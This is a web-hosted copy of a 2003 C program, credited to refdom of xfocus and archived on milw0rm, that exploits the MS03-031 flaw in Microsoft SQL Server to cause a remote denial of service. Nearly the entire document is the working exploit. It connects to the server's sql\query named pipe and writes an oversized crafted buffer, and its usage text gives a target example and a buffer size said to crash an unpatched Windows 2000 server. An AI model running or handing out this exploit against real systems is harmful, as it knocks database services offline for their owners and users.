MS Windows SQL Server Denial of Service Remote Exploit MS03031

Document Sample
MS Windows SQL Server Denial of Service Remote Exploit MS03031 Powered By Docstoc
					                      MS Windows SQL Server Denial of Service Remote Exploit MS03031      Page 1/3
  1    ////////////////////////////////////////////////////////////////
  2    //
  3    //      Microsoft SQL Server DoS Remote Exploit (MS03−031)
  4    //                    By refdom of xfocus
  5    //
  6    ////////////////////////////////////////////////////////////////
  7
  8    #include <stdio.h>
  9    #include <stdlib.h>
  10   #include <windows.h>
  11
  12
  13   void Usage()
  14   {
  15           printf("******************************************\n");
  16           printf("exp for Microsoft SQL Server DoS(MS03−031)\n\n");
  17           printf("\t Written by Refdom\n");
  18           printf("\t Email: refdom xfocus org\n");
  19           printf("\t Homepage: www.xfocus.org\n\n");
  20           printf("Usage: DOSMSSQL.exe server buffersize\n");
  21           printf("eg: DOSMSSQL.exe192.168.0.1 9000\n\n");
  22           printf("The buffersize depends on service pack level.\n");
  23           printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
  24           printf("when buffersize is 9000, the server can be crashed.\n");
  25           printf("\n");
  26           printf("*******************************************\n\n");
  27   }
  28
  29
  30   int main(int argc, char* argv[])
  31   {
  32           char lpPipeName[50];
  33           char *lpBuffer = NULL;
  34           unsigned long ulSize = 0;
  35
  36             BOOL bResult;
  37             DWORD dwWritten = 0, dwMode;
  38             HANDLE hPipe;
  39
  40             Usage();
  41
  42             printf("Starting...\n");
  43
  44             if (argc != 3)
  45                     goto Exit0;
  46
  47             if (strlen(argv[1]) < 20)
  48             {
  49                     sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
  50             }
  51             else
  52             {
refdom                                                                                    07/25/2003
                  MS Windows SQL Server Denial of Service Remote Exploit MS03031               Page 2/3
  53                    printf("Error!server\n");
  54                    goto Exit0;
  55          }
  56
  57          ulSize= atol(argv[2]);
  58
  59          lpBuffer = (char*)malloc(ulSize + 2);
  60          if (NULL == lpBuffer)
  61          {
  62                  printf("malloc error!\n");
  63                  goto Exit0;
  64          }
  65
  66          memset(lpBuffer, 0, ulSize + 2);
  67          memset(lpBuffer, ’A’, ulSize);
  68          *lpBuffer = ’\x12’;
  69          *(lpBuffer + 1) = ’\x01’;
  70          *(lpBuffer + 2) = ’\x00’;
  71
  72          printf("Connecting Server...\n");
  73
  74          hPipe = CreateFile(lpPipeName,
  75                                                GENERIC_READ | GENERIC_WRITE,
  76                                                0,
  77                                                NULL,
  78                                                OPEN_EXISTING,
  79                                                0,
  80                                                NULL);
  81          if (INVALID_HANDLE_VALUE == hPipe)
  82          {
  83                  printf("Error!Connect server!%d\n", GetLastError());
  84                  goto Exit0;
  85          }
  86
  87     dwMode = PIPE_READMODE_MESSAGE;
  88     bResult = SetNamedPipeHandleState(
  89        hPipe,     // pipe handle
  90        &dwMode, // new pipe mode
  91        NULL,      // don’t set maximum bytes
  92        NULL);     // don’t set maximum time
  93     if (!bResult)
  94     {
  95                   printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
  96                   goto Exit0;
  97     }
  98
  99          bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);
  100
  101         if (!bResult)
  102         {
  103                 printf("\n\tError!WriteFile.%d\n\n", GetLastError());
  104                 printf("When see the error message, the target may be crashed!!\n\n");
refdom                                                                                         07/25/2003
                     MS Windows SQL Server Denial of Service Remote Exploit MS03031   Page 3/3
  105                    goto Exit0;
  106            }
  107
  108   Exit0:
  109
  110            return 0;
  111   }
  112
  113   // milw0rm.com [2003−07−25]




refdom                                                                                07/25/2003

				
DOCUMENT INFO